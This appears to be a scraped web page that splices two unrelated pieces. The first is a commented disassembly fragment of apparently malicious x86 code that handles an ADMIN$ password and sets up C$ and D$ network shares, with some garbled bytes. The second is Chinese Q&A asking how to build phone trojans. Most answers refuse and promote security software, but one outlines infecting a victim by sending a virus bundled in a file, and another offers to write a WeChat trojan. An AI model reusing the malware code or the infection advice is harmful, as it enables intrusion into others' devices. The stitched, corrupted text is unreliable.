0352A EB 00 jmp short loc_0432 ; (0352C)
0352C loc_0432: ; xref 0352A
0352C 5F pop edi
0352D B8 00590002 mov eax,590002h
03532 F9 stc ; Set carry flag
03533 C3 retn
03534 loc_0433: ; xref 034A5
03534 8B 34 24 mov esi,[esp]
03537 F6 46 1F 01 test byte ptr [esi+1Fh],1
0353B 0F 85 FFFFFF78 jnz loc_0427 ; Jump if not zero
03541 loc_0434: ; xref 03575, 358F
03541 ?B D3 mov edx,ebx
03543 BB 0000000B mov ebx,0Bh
03548 B8 00050001 mov eax,50001h
0354D E9 FFFFFF1C jmp loc_0421 ; (0346E)
;* No entry point to code
03552 8B 3C 24 mov edi,[esp]
03555 53 push ebx
03556 8B 35 000128B8 mov esi,dword ptr data_0379 ; (128B8=0FFFFF000h)
0355C E8 FFFFE407 call sub_0009 ; (01968)
03561 5B pop ebx
03562 0B ED or ebp,ebp ; Zero ?
03564 0F 84 FFFFFF4F jz loc_0427 ; Jump if zero
0356A 3E: 83 7D 10 00 cmp dword ptr ds:[ebp+ClientEBX],0
0356F 0F 85 FFFFFF44 jne loc_0427 ; Jump if not equal
03575 EB CA jmp short loc_0434 ; (03541)
03577 loc_0435: ; xref 03514
03577 F6 05 00012446 01 test byte ptr data_0317,1 ; (12446=0)
0357E 74 11 jz short loc_0436 ; Jump if zero
03580 F6 46 1F 01 test byte ptr [esi+1Fh],1
03584 75 90 jnz loc_0430 ; NOT ADMIN$ Jump if not zero
03586 66| FF 4B 0E dec word ptr [ebx+0Eh]
0358A C6 41 14 00 mov byte ptr [ecx+14h],0
0358E 56 push esi
0358F EB B0 jmp short loc_0434 ; (03541)
03591 loc_0436: ; xref 0357E
03591 80 4E 1F 01 or byte ptr [esi+1Fh],1
03595 C6 41 15 01 mov byte ptr [ecx+15h],1
03599 8B FE mov edi,esi
0359B 8B 35 000128B8 mov esi,dword ptr data_0379 ; (128B8=0FFFFF000h)
035A1 83 3D 000134E0 00 cmp dword ptr data_0431,0 ; C$,D$ HAVE BEEN SHARED(134E0=0)
035A8 75 14 jne short loc_0437 ; Jump if not equal
035AA 52 push edx
035AB 51 push ecx
035AC 8D 4B 1E lea ecx,dword ptr [ebx+1Eh];THE ADMIN$ PASSWORD
035AF ?1 push ecx ; PARAMETER_1 if ecx=0 no password
035B0 E8 0000856F call sub_0230 ;MAKE C$,D$SHARE (0BB24)
035B5 59 pop ecx
035B6 59 pop ecx
035B7 5A pop edx
035B8 FF 05 000134E0 inc dword ptr data_0431 ; (134E0=0)
035BE loc_0437: ; xref 035A8
035BE 53 push ebx
035BF E8 FFFFE3A4 call sub_0009 ; (01968)
035C4 72 13 jc short loc_0438 ; Jump if carry Set
035C6 8B 3D 00011CCC mov edi,dword ptr data_0192 ; (11CCC=0FFFFF000h)
035CC 8B BF 000000E2 mov edi,dword ptr ds:[0E2h][edi] ; (000E2=358B0000h)
035D2 89 7B 04 mov dword ptr [ebx+4],edi
035D5 5B pop ebx
035D6 85 DB test ebx,ebx
035D8 C3 retn
035D9 loc_0438: ; xref 035C4
035D9 5A pop edx
035DA C6 41 14 00 mov byte ptr [ecx+14h],0
035DE BB 0000000C mov ebx,0Ch
035E3 B8 00010002 mov eax,10002h
035E8 E9 FFFFFE81 jmp loc_0421 ; (0346E)
035ED loc_0439: ; xref 034B3
035ED 75 28 jnz short loc_0440 ; Jump if not zero
035EF 8B 34 24 mov esi,[esp]
035F2 F6 46 1F 01 test byte ptr [esi+1Fh],1
035F6 0F 85 FFFFFEBD jnz loc_0427 ; Jump if not zero
035FC 81 7B 11 494D4441 cmp dword ptr [ebx+11h],494D4441h
03603 75 12 jne short loc_0440 ; Jump if not equal
03605 66| 81 7B 15 244E cmp word ptr [ebx+15h],244Eh
0360B 75 0A jne short loc_0440 ; Jump if not equal
0360D 80 7B 17 00 cmp byte ptr [ebx+17h],0
03611 0F 84 FFFFFEA2 je loc_0427 ; Jump if equal
03617 loc_0440: ; xref 035ED, 3603, 360B
03617 B8 00510002 mov eax,510002h
0361C 5F pop edi
0361D F9 stc ; Set carry flag
0361E C3 retn
sub_0026 endp
如何 *** 手机木马病毒?
手机怎么 *** 病毒、木马
你这是啥意思?难道 你会开发手机软件吗,我们编写手机软件时加入恶意代码手机运行就会被执行
祝你成功
手机病毒木马 *** *** 求解。。。
你会开发手机软件吗,我们编写手机软件时加入恶意代码手机运行就会被执行。
怎么 *** 手机木马
您好! 手机是无法编写木马程序的,也不建议您编写 *** 木马程序,木马程序是有很大的安全隐患的哦,然后建议您使用腾讯手机管家保护您的手机的安全吧,您可以使用u *** 数据线将手机连接到电脑,然后打开腾讯电脑管家的软件管理,在软件管理里面搜索腾讯手机管家,然后选择腾讯手机管家后一键下载安装到手机就可以。
如何让别人的手机中病毒或木马
首先。会 *** 病毒。然后。绑到TXT里面。然后。发给你要让他中病毒的。手机。然后让他。解压。就ok
手机木马病毒是用电脑制做的吗?
这个不一定,现在的手机病毒很猖獗,
手机上网很容易中病毒的,
你可以使用腾讯手机管家查杀一下,
它可以智能扫描,对病毒进行全面查杀;
进入病毒查杀界面;点击底端切换进入
安全防护并且点击病毒查杀;
从而把手机上的病毒查杀的更干净,更彻底。
手机中木马该怎么做?
手机出现静默安装垃圾软件、奇怪图标、广告推送等情况一般都是中毒引起的,可以使用安全软件对手机进行检测,请尝试按照以下步骤进行清除:
安装一个安全类软件,以手机管家为例,打开手机管家。点击首页上的一键体检即可自动查杀系统中的病毒,并自动彻底清除。
若提示无法删除很可能是权限不足导致的,病毒一般都是存在于系统分区中,正常的卸载方式无法卸载,即使是恢复出厂设置也无法将其删除,必须有ROOT权限才能卸载。
获取ROOT权限可以使用电脑端的一键ROOT工具进行,例如:KINGROOT、ROOT精灵等。然后对手机管家进行授权再深度查杀即可彻底删除。
手机可不可以做木马病毒?????应该怎么做
您好:
建议你不要 *** 或使用手机木马病毒,木马病毒会对您的手机造成损坏的,如果您使用过这种不安全的木马病毒的话,为了您手机的安全建议您使用腾讯手机管家的杀毒功能对您的手机进行全面的杀毒吧,您可以点击这里下载最新版的腾讯手机管家:腾讯手机管家下载
腾讯电脑管家企业平台:zhidao.baidu/c/guanjia/
你好 怎么 *** 手机木马啊
您好,请不要传播病毒、盗号木马程序,恶意传播病毒和木马会污染互联网环境,请您加入到维护 *** 安全的大军中! *** 木马程序会导致您和他人的帐号和密码泄露,从而可能使您和他人的 *** 财产,如游戏、QB等受到严重威胁,严重的还会违反法律。请您不要轻易安装陌生人传送给您的未知文件,有可能是病毒或者木马。建议您安装腾讯手机管家对您的手机进行实时防护,保护您手机安全运行,避免给您的财产和个人隐私带来威胁。您可以在腾讯电脑管家——应用宝中下载
希望可以帮到您,望采纳。
腾讯电脑管家企业平台:zhidao.baidu/c/guanjia/
求 *** 手机微信木马病毒
首先得说明白给你听,木马是窃取信息和资料的,病毒是带破坏性,所以这两东西是不一样的,你要的话我可以写个给你
怎么向苹果手机植入木马病毒
病毒不能告诉你,但是 ,手机必须越狱获取权限后,才能植入!
0条大神的评论